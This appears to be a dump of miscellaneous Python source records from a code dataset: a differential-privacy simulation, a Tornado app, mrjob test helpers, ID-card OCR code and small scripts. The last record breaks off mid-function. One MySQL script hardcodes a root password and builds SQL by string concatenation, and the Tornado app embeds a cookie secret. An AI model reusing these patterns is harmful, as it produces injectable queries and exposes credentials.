\"static/hrap_point_4326.prj\",\n \"weeklyrain/%srain.prj\" % (now.strftime(\"%Y%m%d\"),),\n )\n\n now += interval\n","sub_path":"scripts/GIS/weeklyPrecip.py","file_name":"weeklyPrecip.py","file_ext":"py","file_size_in_byte":2018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"475834676","text":"\"\"\"Simulation of the impact of differential privacy on a block that has\nN people all the same age (22).\"\"\"\n\nBLOCK_AGE=22\nMAX_AGE=110\nNUM_TRIALS=10000\nTRIALS='trials'\nPRIVATIZED_AVERAGE_AGE='privatized_average_age'\nPRIVATIZED_AVERAGE_AGES='privatized_average_ages'\nPRIVATIZED_COUNT='privatized_count'\nPRIVATIZED_COUNTS='privatized_counts'\nPRIVATIZED_MEDIAN_AGE='privatized_median_age'\nPRIVATIZED_MEDIAN_AGES='privatized_median_ages'\n\nEPSILON='ε'\nNPEOPLE='npeople'\nPERCENTILES=[5, 25, 50, 75, 95]\nimport numpy as np\nimport matplotlib.pyplot as plot\n\ndef privitize_block(epsilon, npeople):\n \"\"\"Given a block of npeople all the same age, return the private value of\n (averageAge, count)\n \"\"\"\n hist = np.resize(0,MAX_AGE)\n hist[BLOCK_AGE] = npeople\n private_hist = hist + np.random.laplace(loc=0,\n scale=np.resize(1/epsilon,MAX_AGE))\n private_count = private_hist.sum()\n private_average_age = (private_hist * np.arange(MAX_AGE)).sum() / private_count\n\n # Compute the median age by performing a linear interpolation\n # to 0.5 over the cumulative probability function\n # c.f. https://stackoverflow.com/questions/43992223/compute-median-for-numpy-histogram2d-data\n normalized_private_histogram = private_hist / private_hist.sum()\n private_median_age = np.interp(.5, np.cumsum(normalized_private_histogram), np.arange(MAX_AGE))\n\n return {PRIVATIZED_COUNT:private_count,\n PRIVATIZED_AVERAGE_AGE:private_average_age,\n PRIVATIZED_MEDIAN_AGE:private_median_age}\n\ndef run_experiment(epsilon, npeople, num_trials=NUM_TRIALS):\n \"\"\"Repeatedly run the experiment and report back the average ages and average counts.\"\"\"\n runs = [privitize_block(epsilon, npeople) for i in range(num_trials)]\n private_counts = np.array([o[PRIVATIZED_COUNT] for o in runs])\n private_average_ages = np.array([o[PRIVATIZED_AVERAGE_AGE] for o in runs])\n private_median_ages = np.array([o[PRIVATIZED_MEDIAN_AGE] for o in runs])\n return {EPSILON:epsilon,\n NPEOPLE:npeople,\n TRIALS:NUM_TRIALS,\n PRIVATIZED_COUNTS:private_counts,\n PRIVATIZED_AVERAGE_AGES:private_average_ages,\n PRIVATIZED_MEDIAN_AGES:private_median_ages }\n\nif __name__==\"__main__\":\n data = []\n labels = []\n for epsilon in [1]:\n for num_people in [1,10,100]:\n expdata = run_experiment(epsilon, npeople=num_people, num_trials=NUM_TRIALS)\n print(f\"epsilon: {epsilon} num_people: {num_people}\")\n\n count_per = np.percentile(expdata[PRIVATIZED_COUNTS],[25,75,2.5,97.5])\n print(f\"count 25%-75% percentiles: \", count_per[0],count_per[1])\n print(f\"count 95% percentiles: \", count_per[2],count_per[3])\n\n median_per = np.percentile(expdata[PRIVATIZED_MEDIAN_AGES],[25,75,2.5,97.5])\n print(f\"median 25%-75% percentiles: \", median_per[0],median_per[1])\n print(f\"median 95% percentiles: \", median_per[2],median_per[3])\n\n average_per = np.percentile(expdata[PRIVATIZED_AVERAGE_AGES],[25,75,2.5,97.5])\n print(f\"average 25%-75% percentiles: \", average_per[0],average_per[1])\n print(f\"average 95% percentiles: \", average_per[2],average_per[3])\n\n\n print(\"\")\n\n\n\"\"\"\n labels.append(str(epsilon))\n expdata = run_experiment(epsilon, npeople=1, num_trials=NUM_TRIALS)\n data.append( expdata[PRIVATIZED_COUNTS])\n \n fig, ax = plot.subplots()\n fig.set_size_inches(8,6)\n #ax.set_title(f\\\"average age distribution vs. epsilon for {NUM_TRIALS} trials, n=1\\\")\n ax.set_title(f\\\"average count vs. epsilon for {len(data[0])} trials, n=1\\\")\n ax.boxplot(labels=labels, x=data);\n ax.set_ylim(-20,20)\n ax.set_ylabel(\\\"average count\\\")\n ax.set_xlabel(EPSILON)\n plot.show()\"\n\"\"\"\n \n\n\n\n\n","sub_path":"demo3/demo4.py","file_name":"demo4.py","file_ext":"py","file_size_in_byte":3867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"650974362","text":"import cv2\nimport time\n\ncapture = cv2.VideoCapture(0)\nfor i in range(100):\n\tst=time.time()\n\tret,frame=capture.read()\n\tend=time.time()\n\tprint(end-st)\n\tcv2.imshow(\"frame\",frame)\n\tcv2.waitKey(1000)","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"462750487","text":"# encoding: utf-8\n# Copyright (c) 2008-2014, IPython Development Team and Enthought, Inc.\n\"\"\"\nCreate a distarray, then plot its array distribution.\n\"\"\"\n\n__docformat__ = \"restructuredtext en\"\n\nimport distarray\n\n\nc = distarray.Context()\na = c.zeros((10, 10, 10), dtype='int32', dist=('b', 'n', 'c'))\n","sub_path":"examples/make_distarray.py","file_name":"make_distarray.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"527503044","text":"#!/usr/bin/env python\n# -*-coding: utf-8 -*-\n__author__ = 'livvy'\n\nimport tornado.web\nimport tornado.options\nimport tornado.httpserver\nimport tornado.ioloop\nimport torndb\nimport os.path\nimport controller.home\nimport controller.account\nimport controller.question\nimport logging\nimport config\nimport controller.test\nimport loggingConfig\n\n__all__ = ['Application']\n\ntornado.options.define(\"port\", default=8888, help=\"run the given port\",\n type=int)\n\n\nclass Application(tornado.web.Application):\n def __init__(self):\n self.announce = controller.test.Announce()\n handlers = [\n (r\"/\", controller.home.HomeHandler),\n (r\"/account/login\", controller.account.LoginHandler),\n (r\"/account/logout\", controller.account.LogoutHandler),\n (r\"/account/register\", controller.account.RegisterHandler),\n (r\"/question/ask\", controller.question.AskHandler),\n (r\"/question/show/([\\d]+)\", controller.question.ShowHandler),\n (r\"/home/myPage\",controller.home.myPageHandler),\n\n (r\"/home/test\",controller.test.MainHandler),\n (r\"/home/test/chat\",controller.test.ChatHandler),\n (r\"/home/test/status\",controller.test.StatusHandler)\n ]\n settings = dict(\n site_title=u\"PengCaCa\",\n template_path=os.path.join(os.path.dirname(__file__), \"templates\"),\n static_path=os.path.join(os.path.dirname(__file__), \"static\"),\n xsrf_cookie=True,\n cookie_secret=\"傻羊ASFfgshhajHJkwiqksmsKKd_asjjksaLsesdl\",\n login_url=\"/account/login\",\n debug=True,\n )\n tornado.web.Application.__init__(self, handlers, **settings)\n self.db = torndb.Connection(\n host=config.SiteConfig.get('database',\n 'host') + ':' + config.SiteConfig.get(\n 'database', 'port'),\n database=config.SiteConfig.get('database', 'db'),\n user=config.SiteConfig.get('database', 'user'),\n password=config.SiteConfig.get('database', 'password'))\n\n\ndef main():\n tornado.options.parse_command_line()\n http_server = tornado.httpserver.HTTPServer(Application())\n http_server.listen(tornado.options.options.port)\n tornado.ioloop.IOLoop.instance().start()\n\n\nif __name__ == \"__main__\":\n logging.getLogger(\"site\").info(\"start\")\n main()\n\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"308889253","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport schedule\nimport time\nfrom vkmessage import vkpost\n\n\ndef job():\n fly = vkpost()\n print(fly)\n return\n\n\nschedule.every().day.at(\"08:30\").do(job)\n\nwhile True:\n schedule.run_pending()\n time.sleep(1)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"619941091","text":"# -*- coding: utf-8 -*-\n\nimport MySQLdb as mdb\n\nconn = mdb.connect(host= \"localhost\",\n\t\t\t\t user=\"root\",\n\t\t\t\t passwd=\"ibo43har\",\n\t\t\t\t db=\"garten\")\nx = conn.cursor()\n\nlinecount = 0\nfile = open(\"/tmp/plants.txt\", \"r\")\nfor line in file:\n if line=='':\n break\n linecount = linecount + 1\n if linecount == 1:\n plant_name = line.strip('\\n')\n if linecount == 2:\n plant_batt = line.strip('\\n')\n if linecount == 3:\n plant_water = line.strip('\\n')\n if linecount == 4:\n plant_temp = line.strip('\\n')\n if linecount == 5:\n plant_light = line.strip('\\n')\n\n sql = \"INSERT INTO plants (sensor_name,battery,water,temp,light) VALUES('\" + plant_name + \"',\" + plant_batt + \",\" + plant_water + \",'\" + plant_temp + \"',\" + plant_light + \");\"\n x.execute(sql)\n \n linecount = 0\n #print sql\nx.close\nconn.commit()\n","sub_path":"poolmodules/miflora/write_plantsdb.py","file_name":"write_plantsdb.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"6435716","text":"# Copyright 2009-2012 Yelp and Contributors\n# Copyright 2013 David Marin\n# Copyright 2015-2016 Yelp\n# Copyright 2017 Yelp\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport os\nimport os.path\nimport random\nimport stat\nfrom contextlib import contextmanager\nfrom tempfile import mkdtemp\nfrom shutil import rmtree\nfrom unittest import TestCase\n\nimport mrjob\nfrom mrjob import runner\n\nfrom tests.py2 import patch\nfrom tests.quiet import add_null_handler_to_root_logger\n\n\n# simple config that also silences 'no config options for runner' logging\nEMPTY_MRJOB_CONF = {'runners': {\n 'local': {\n 'label': 'test_job',\n },\n 'emr': {\n 'check_cluster_every': 0.00,\n 'cloud_fs_sync_secs': 0.00,\n },\n 'hadoop': {\n 'label': 'test_job',\n },\n 'inline': {\n 'label': 'test_job',\n },\n 'dataproc': {\n 'api_cooldown_secs': 0.00,\n 'cloud_fs_sync_secs': 0.00\n }\n}}\n\n\ndef mrjob_conf_patcher(substitute_conf=EMPTY_MRJOB_CONF):\n def mock_load_opts_from_mrjob_confs(runner_alias, conf_paths=None):\n return [(None, substitute_conf['runners'][runner_alias])]\n\n return patch.object(runner, 'load_opts_from_mrjob_confs',\n mock_load_opts_from_mrjob_confs)\n\n\n@contextmanager\ndef random_seed(seed):\n \"\"\"Temporarily change the seed of the random number generator.\"\"\"\n state = random.getstate()\n\n random.seed(seed)\n\n try:\n yield\n finally:\n random.setstate(state)\n\n\nclass PatcherTestCase(TestCase):\n\n def start(self, patcher):\n \"\"\"Add the given patcher to this test case's cleanup actions,\n then start it, and return the mock it returns. Example:\n\n mock_turtle = self.start(patch('foo.bar.turtle'))\n \"\"\"\n mock = patcher.start()\n # don't addCleanup() if patcher fails\n self.addCleanup(patcher.stop)\n return mock\n\n\nclass EmptyMrjobConfTestCase(PatcherTestCase):\n\n # set to None if you don't want load_opts_from_mrjob_confs patched\n MRJOB_CONF_CONTENTS = EMPTY_MRJOB_CONF\n\n def setUp(self):\n super(EmptyMrjobConfTestCase, self).setUp()\n\n add_null_handler_to_root_logger()\n\n if self.MRJOB_CONF_CONTENTS is not None:\n patcher = mrjob_conf_patcher(self.MRJOB_CONF_CONTENTS)\n patcher.start()\n self.addCleanup(patcher.stop)\n\n\nclass SandboxedTestCase(EmptyMrjobConfTestCase):\n \"\"\"Patch mrjob.conf, create a temp directory, and save the environment for\n each test\n \"\"\"\n def setUp(self):\n super(SandboxedTestCase, self).setUp()\n\n # tmp dir\n self.tmp_dir = mkdtemp()\n self.addCleanup(rmtree, self.tmp_dir)\n\n # environment\n old_environ = os.environ.copy()\n # cleanup functions are called in reverse order\n self.addCleanup(os.environ.update, old_environ)\n self.addCleanup(os.environ.clear)\n\n def makedirs(self, path):\n abs_path = os.path.join(self.tmp_dir, path)\n if not os.path.isdir(abs_path):\n os.makedirs(abs_path)\n return abs_path\n\n def makefile(self, path, contents=b'', executable=False):\n self.makedirs(os.path.dirname(path))\n abs_path = os.path.join(self.tmp_dir, path)\n\n mode = 'wb' if isinstance(contents, bytes) else 'w'\n with open(abs_path, mode) as f:\n f.write(contents)\n if executable:\n os.chmod(abs_path,\n os.stat(abs_path).st_mode | stat.S_IXUSR)\n\n return abs_path\n\n def abs_paths(self, *paths):\n return [os.path.join(self.tmp_dir, path) for path in paths]\n\n def add_mrjob_to_pythonpath(self):\n \"\"\"call this for tests that are going to invoke a subprocess\n that needs to find mrjob.\n\n (Merely using the local runner won't require this, because it\n bootstraps mrjob by default.)\n \"\"\"\n os.environ['PYTHONPATH'] = (\n mrjob_pythonpath() + ':' + os.environ.get('PYTHONPATH', ''))\n\n\ndef mrjob_pythonpath():\n \"\"\"The directory containing the mrjob package that we've imported.\"\"\"\n return os.path.abspath(\n os.path.join(os.path.dirname(mrjob.__file__), '..'))\n","sub_path":"tests/sandbox.py","file_name":"sandbox.py","file_ext":"py","file_size_in_byte":4654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"239019713","text":"import media\r\nimport fresh_tomatoes\r\n\r\n# Joseph Langdale FSND 8-20-2017\r\n# this code is used in conjuction with media.py and fresh_tomatoes.py\r\n# to build a HTML page\r\n# media.py contains class movie\r\n# fresh_tomatoes.py builds the html page\r\n# highlighting my favorite movies of 2017\r\n# Version 2\r\n\r\n\r\n# Build Movie Objects\r\n\r\ndunkirk = media.Movie(\"Dunkirk\",\r\n \"The strugle of the British Army to return home from\"\r\n \" France early in World War 2.\",\r\n \"Christopher Nolan\",\r\n \"2017\",\r\n \"https://upload.wikimedia.org/wikipedia/en/1/15/Dunkirk_Film_poster.jpg\", # NOQA\r\n \"https://www.youtube.com/watch?v=F-eMt3SrfFU\")\r\n\r\nbaby_driver = media.Movie(\"Baby Driver\",\r\n \"A young get-away driver gets in over his head.\",\r\n \"Edgar Wright\",\r\n \"2017\",\r\n \"https://upload.wikimedia.org/wikipedia/en/8/8e/Baby_Driver_poster.jpg\", # NOQA\r\n \"https://www.youtube.com/watch?v=z2z857RSfhk\")\r\n\r\nspider_man_homecoming = media.Movie(\"Spider-Man:Homecoming\",\r\n \"Peter Parker returns to New York after\"\r\n \"his Avenger outing.\",\r\n \"Jon Watts\",\r\n \"2017\",\r\n \"https://upload.wikimedia.org/wikipedia/en/f/f9/Spider-Man_Homecoming_poster.jpg\", # NOQA\r\n # NOQA\r\n \"https://www.youtube.com/watch?v=8wNgphPi5VM\") # NOQA\r\n\r\nguardians = media.Movie(\"Guardians of the Galaxy Vol. 2\",\r\n \"The Galaxy needs savigng again.\",\r\n \"James Gunn\",\r\n \"2017\",\r\n \"https://upload.wikimedia.org/wikipedia/en/9/95/GotG_Vol2_poster.jpg\", # NOQA\r\n \"https://www.youtube.com/watch?v=duGqrYw4usE\")\r\n\r\nwonder_woman = media.Movie(\"Wonder Woman \",\r\n \"In a time of war a hero leaves her home to save\"\r\n \"the world.\",\r\n \"Patty Jenkins\",\r\n \"2017\",\r\n \"https://upload.wikimedia.org/wikipedia/en/e/ed/Wonder_Woman_%282017_film%29.jpg\", # NOQA\r\n \"https://www.youtube.com/watch?v=VSB4wGIdDwo\")\r\n\r\ncolossal = media.Movie(\"Colossal\",\r\n \"An unemployed writer returns to her hometown to sort\"\r\n \"things out\",\r\n \"Nacho Vigalondo\",\r\n \"2017\",\r\n \"https://upload.wikimedia.org/wikipedia/en/3/33/Colossal_%28film%29.png\", # NOQA\r\n \"https://www.youtube.com/watch?v=Q8hpm_BcHKE\"\r\n )\r\n\r\nkong = media.Movie(\"Kong:Skull Island\",\r\n \"Researchers are escorted to a seculded island in the\"\r\n \"Pacific\",\r\n \"Jordan Vogt-Roberts\",\r\n \"2017\",\r\n \"https://upload.wikimedia.org/wikipedia/en/3/34/Kong_Skull_Island_poster.jpg\", # NOQA\r\n \"https://www.youtube.com/watch?v=44LdLqgOpjo\")\r\n\r\nwick = media.Movie(\"John Wick: Chapter 2\",\r\n \"An assassin becomes the hunted\",\r\n \"Chad Stahelski\",\r\n \"2017\",\r\n \"https://upload.wikimedia.org/wikipedia/en/3/31/John_Wick_Chapter_Two.png\", # NOQA\r\n \"https://www.youtube.com/watch?v=ChpLV9AMqm4\")\r\n\r\nlogan = media.Movie(\"Logan\",\r\n \"The Wolverines journey continues.\",\r\n \"James Mangold\",\r\n \"2017\",\r\n \"https://upload.wikimedia.org/wikipedia/en/3/37/Logan_2017_poster.jpg\", # NOQA\r\n \"https://www.youtube.com/watch?v=RH3OxVFvTeg\")\r\n\r\n# Assemble list of movie objects\r\nmovies = [\r\n baby_driver, wonder_woman,\r\n logan, wick,\r\n dunkirk, colossal,\r\n kong, spider_man_homecoming,\r\n guardians]\r\n\r\n# call function from fresh_tomatoes to build web page\r\nfresh_tomatoes.open_movies_page(movies)\r\n","sub_path":"entertainment_center.py","file_name":"entertainment_center.py","file_ext":"py","file_size_in_byte":4272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"90079428","text":"'''import requests\nfrom bs4 import BeautifulSoup as BS\n\npage=requests.get('7-5.html')\nres=BS(page.text,'lxml')\n#print(res)\n#list = res.find('div', class_='container')\nlist1=res.findAll('div', class_='course')\nprint(len(list1))'''\n\n\n'''\nМы сохранили страницу с википедии про языки программирования и сохранили \nпо адресу https://stepik.org/media/attachments/lesson/209717/1.html\n\nСкачайте её с помощью скрипта на Питоне и посчитайте, какой язык упоминается \nчаще Python или C++ (ответ должен быть одной из этих двух строк). \nНеобходимо просто подсчитать количество вхождений слова Python или C++ как подстроки.\n'''\n\na=open('7-5.html','r',encoding='utf8')\ncnt_python=0\ncnt_cpp=0\nfor line in a:\n cnt_python+=line.count('Python')\n cnt_cpp+=line.count('C++')\nprint('Python') if cnt_cpp'\n#def allowed_file(filename):\n#\treturn '.'in filename and filename.rsplit('.',1)[1] in ALLOWED_EXTENSIONS\n#db.create_all()\n#qq=mem('swpd','free','buff')\n#db.session.add(qq)\n#db.session.commit()\ndb.create_all()\n@app.route('/',methods=['GET','POST'])\ndef upload_file():\n\tif request.method=='POST':\n\t\tfile1=request.files['file']\n\t\tsource1=json.load(file1)\n#\t\tif qq :\n#\t\t\tdb.session.delete(qq)\n#\t\t\tdb.session.commit()\n#\t\tdb.create_all()\n\t\tqq=mem(source1['swpd'],source1['free'],source1['buff'])\n\t\tdb.session.add(qq)\n\t\tdb.session.commit()\n@app.route('/show_data')\ndef show_data():\n\tmem_show=mem.query.filter_by(id=1).first()\n\tcom1=mem_show.swpd\n\tcom2=mem_show.free\n\tcom3=mem_show.buff\n\treturn render_template('show_data.html',com1=com1,com2=com2,com3=com3)\n\n#\t\tif file1 and allowed_file(file1.filename):\n#\t\t\tfilename =secure_filename(file1.filename)\n#\t\t\tfile1.save(os.path.join(app.config['UPLOAD_FOLDER'],filename))\n#\n#\t\t\tsource1=json.load(file1)\n#\t\t\tdb.create_all()\n#\t\t\tqq=mem(source1['swpd'],source1['free'],source1['buff'])\n#\t\t\tdb.session.add(qq)\n#\t\t\tdb.session.commit()\n#\t\t\treturn redirect(url_for('uploaded_file',filename=filename))\n#\t\telse:\n#\t\t\treturn \"no exit\"\n#\treturn '''\n#\t\n#\t Upload new File\n#\t

    Upload new File

    \n#\t
    \n#\t \t

    \n#\t \t\t\n#\t

    \n#\t'''\n#@app.route('/uploads/')\n#def uploaded_file(filename):\n#\treturn send_from_directory(app.config['UPLOAD_FOLDER'],filename)\nif __name__=='__main__':\n\tapp.run()\n","sub_path":"load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":2337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"541053608","text":"from __future__ import division, print_function, unicode_literals\nimport cv2\nimport numpy as np\n\n\nNORM_SIZE = (1100, 800)\nMERGE_SIZE = (700, 530)\n# ID number field\nNUM_FIELD = np.array([[450, 210], [920, 270]], dtype='int')\nNUM_TITLE = np.array([[0, 0], [70, 60]], dtype='int')\n# Name field\nNAME_FIELD = np.array([[340, 280], [1040, 420]], dtype='int')\nNAME_TITLE = np.array([[0, 0], [120, 70]], dtype='int')\n# Date of birth field\nDOB_FIELD = np.array([[340, 420], [1040, 490]], dtype='int')\nDOB_TITLE = np.array([[0, 0], [180, 70]], dtype='int')\n# Birth place field\nBPLACE_FIELD = np.array([[340, 490], [1040, 625]], dtype='int')\nBPLACE_TITLE = np.array([[0, 0], [230, 60]], dtype='int')\n# Current living place field\nCPLACE_FIELD = np.array([[340, 625], [1040, 755]], dtype='int')\nCPLACE_TITLE = np.array([[0, 0], [340, 60]], dtype='int')\n\nTEXT_MIN_WIDTH = 5\nTEXT_MIN_HEIGHT = 20\n\n\nclass Span():\n\tdef __init__(self, x0, y0, img):\n\t\tself.x0 = x0\n\t\tself.y0 = y0\n\t\tself.image = img\n\n\t\tself.segcols = None # segmentation columns in ground truth\n\t\tself.predict_segments = None # predicted segmentation columns\n\t\tself.refine_segments = None # refined segmentation columns (2-means clustering)\n\t\tself.predict_characters = None # predicted character list\n\n\nclass Field():\n\tdef __init__(self, img, name):\n\t\tself.image = img\n\t\tself.name = name\n\n\t\tself.spans = [] # list of Spans\n\t\t\n\t\tself.postprocessed_text = None # text in field, post-processed\n\n\tdef get_raw_text(self):\n\t\ttext = '\\n'.join([''.join([c for c in s.predict_characters]) for s in self.spans])\n\t\treturn text\n\n\tdef hide_title(self, title):\n\t\tself.image[title[0][1]:title[1][1], title[0][0]:title[1][0]] = 255\n\n\tdef find_text_spans(self):\n\t\timg_b = self.image[:, :, 0]\n\t\timg_g = self.image[:, :, 1]\n\n\t\tidx_black = np.bitwise_and(img_b < 170, img_g < 170) # DOF\n\n\t\tthresh = np.ones_like(self.image) * 255\n\t\tthresh = cv2.cvtColor(thresh, cv2.COLOR_BGR2GRAY)\n\t\tthresh[idx_black] = 0\n\n\t\tkernel1 = np.ones((3,1), np.uint8) # DOF\n\t\tkernel2 = np.ones((1,3), np.uint8) # DOF\n\t\t\n\t\thorizontal = cv2.erode(thresh, kernel1, iterations=1)\n\t\thorizontal = cv2.dilate(horizontal, kernel2, iterations=4)\n\n\t\tvertical = cv2.erode(thresh, kernel2, iterations=1)\n\t\tvertical = cv2.dilate(vertical, kernel1, iterations=4)\n\n\t\tthresh = np.minimum(horizontal, vertical)\n\n\t\tkernel3 = np.ones((1,5), np.uint8)\n\t\tthresh = cv2.erode(thresh, kernel3, iterations=10)\n\n\t\tbig_boxes = self._get_contour_boxes(thresh)\n\n\t\tfor b in big_boxes:\n\t\t\tx0, y0, w, h = b\n\t\t\ty0 = max(0, y0-10)\n\t\t\th = min(self.image.shape[0], y0+h+20)\n\t\t\timg = self.image[y0:h, x0:x0+w]\n\t\t\tself.spans.append(Span(x0, y0, img))\n\n\tdef _get_contour_boxes(self, img):\n\t\tmask = cv2.bitwise_not(img)\n\t\t\n\t\tif cv2.__version__[0] == '3':\n\t\t\t_, contours, _ = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n\t\telse:\n\t\t\tcontours, _ = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n\n\t\tcontour_big_boxes = []\n\t\tfor contour in contours:\n\t\t\trect = cv2.boundingRect(contour)\n\t\t\t_, ymin, width, height = rect\n\n\t\t\tif (width < TEXT_MIN_WIDTH or height < TEXT_MIN_HEIGHT):\n\t\t\t\tcontinue\n\n\t\t\tpos = 0\n\t\t\twhile contour_big_boxes and contour_big_boxes[pos][1] < ymin:\n\t\t\t\tpos += 1\n\t\t\tcontour_big_boxes.insert(pos, rect)\n\n\t\treturn contour_big_boxes\n\n\nclass Image():\n\tdef __init__(self, img, name=None):\n\t\tself.image = cv2.resize(img, dsize=NORM_SIZE, interpolation=cv2.INTER_CUBIC)\n\n\t\tif name:\n\t\t\tself.base = name.split('.')[0]\n\t\t\tself.extension = name.split('.')[1]\n\n\t\tself.fields = self._get_fields() # list of infor fields\n\t\tfor f in self.fields:\n\t\t\tf.find_text_spans()\n\n\tdef merge_fields(self):\n\t\t# merge 5 information fields (images) into one image to be recognized\n\t\tpadding = 20\n\t\tmerged_img = np.ones((MERGE_SIZE[1]+padding*2, MERGE_SIZE[0]+padding*2), dtype=\"uint8\") * 255\n\t\tcur_y = padding\n\t\tcur_x = padding\n\n\t\tmerged_img = cv2.cvtColor(merged_img, cv2.COLOR_GRAY2RGB)\n\n\t\tfor f in self.fields:\n\t\t\theight, width = f.image.shape[:2]\n\t\t\tmerged_img[cur_y:cur_y+height, cur_x:cur_x+width] = f.image\n\t\t\tcur_y += height\n\t\treturn merged_img\n\n\tdef _get_fields(self):\n\t\t# return all 5 information fields as 5 independent images\n\t\tnum = Field(img=self.image[NUM_FIELD[0][1]:NUM_FIELD[1][1], NUM_FIELD[0][0]:NUM_FIELD[1][0]], name='num')\n\t\tnum.hide_title(NUM_TITLE)\n\n\t\tname = Field(img=self.image[NAME_FIELD[0][1]:NAME_FIELD[1][1], NAME_FIELD[0][0]:NAME_FIELD[1][0]], name='name')\n\t\tname.hide_title(NAME_TITLE)\n\n\t\tdob = Field(img=self.image[DOB_FIELD[0][1]:DOB_FIELD[1][1], DOB_FIELD[0][0]:DOB_FIELD[1][0]], name='dob')\n\t\tdob.hide_title(DOB_TITLE)\n\n\t\tbplace = Field(img=self.image[BPLACE_FIELD[0][1]:BPLACE_FIELD[1][1], BPLACE_FIELD[0][0]:BPLACE_FIELD[1][0]], name='bplace')\n\t\tbplace.hide_title(BPLACE_TITLE)\n\n\t\tcplace = Field(img=self.image[CPLACE_FIELD[0][1]:CPLACE_FIELD[1][1], CPLACE_FIELD[0][0]:CPLACE_FIELD[1][0]], name='cplace')\n\t\tcplace.hide_title(CPLACE_TITLE)\n\n\t\tfields = [num, name, dob, bplace, cplace]\n\t\treturn fields\n","sub_path":"IdRecDemo/idocr/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"10322590","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Nov 23 01:01:53 2021\r\n\r\n@author: vikal\r\n\"\"\"\r\n\r\nPI = 3.141592653589793238\r\n\r\n\r\ndef mulai():\r\n while True:\r\n masuk = input(\"\\nElemenkompetensi berapa?: \")\r\n if masuk == \"1\":\r\n elemenkompetensi1()\r\n elif masuk == \"2\":\r\n elemenkompetensi2()\r\n elif masuk == \"e\":\r\n break\r\n else:\r\n print(\"Pilih 1 atau 2, e untuk keluar\\n\")\r\n\r\n\r\ndef elemenkompetensi1():\r\n print(\"MENGHITUNG KECEPATAN AKHIR GLBB (diketahui jarak tempuh)\")\r\n v0 = int(input(\"Masukkan v0: \"))\r\n a = int(input(\"Masukkan a: \"))\r\n s = int(input(\"Masukkan s: \"))\r\n\r\n def vt(kec_awal, percepatan, jarak):\r\n return (kec_awal ** 2 + (2 * percepatan * jarak)) ** (1 / 2)\r\n\r\n vt = vt(v0, a, s)\r\n\r\n print(\"Jarak tempuh jika kecepatan awal:\", v0, \"percepatan:\", a, \"dan jarak tempuh:\", s, \"adalah:\", vt)\r\n\r\n\r\ndef elemenkompetensi2():\r\n def kubus():\r\n masuk = int(input(\"Masukkan nilai rusuk: \"))\r\n print(\"Luas permukaan kubus dengan rusuk\", masuk, \"adalah\", hitung_kubus(masuk), \"\\n\")\r\n\r\n def hitung_kubus(rusuk):\r\n return rusuk ** 2 * 6\r\n\r\n def balok():\r\n masuk1, masuk2, masuk3 = int(input(\"Masukkan nilai panjang: \")), int(input(\"Masukkan nilai lebar: \")), int(\r\n input(\"Masukkan nilai tinggi: \"))\r\n print(\"Luas permukaan balok dengan panjang {}, lebar {} dan tinggi {} \" \"adalah\".format(masuk1, masuk2, masuk3),\r\n hitung_balok(masuk1, masuk2, masuk3), \"\\n\")\r\n\r\n def hitung_balok(panjang, lebar, tinggi):\r\n return panjang * tinggi * 2 + panjang * lebar * 2 + tinggi * lebar * 2\r\n\r\n def tabung():\r\n masuk1, masuk2 = int(input(\"Masukkan nilai jari-jari: \")), int(input(\"Masukkan nilai tinggi: \"))\r\n print(\"Luas permukaan tabung dengan jari-jari {} dan tinggi {} \" \"adalah\".format(masuk1, masuk2),\r\n hitung_tabung(masuk1, masuk2, PI), \"\\n\")\r\n\r\n def hitung_tabung(jari2, tinggi, pi):\r\n return 2 * pi * jari2 * (tinggi + jari2)\r\n\r\n def kerucut():\r\n masuk1, masuk2 = int(input(\"Masukkan nilai jari-jari: \")), int(input(\"Masukkan nilai garis lukis: \"))\r\n print(\"Luas permukaan kerucut dengan jari-jari {} dan garis lukis {} \" \"adalah\".format(masuk1, masuk2),\r\n hitung_kerucut(masuk1, masuk2, PI), \"\\n\")\r\n\r\n def hitung_kerucut(jari2, garis_lukis, pi):\r\n return pi * jari2 ** 2 + pi * jari2 * garis_lukis\r\n\r\n def bola():\r\n masuk1 = int(input(\"Masukkan nilai jari-jari: \"))\r\n print(\"Luas permukaan bola dengan jari-jari {} \" \"adalah\".format(masuk1), hitung_bola(masuk1, PI), \"\\n\")\r\n\r\n def hitung_bola(jari2, pi):\r\n return 4 * pi * (jari2 * jari2)\r\n\r\n while True:\r\n 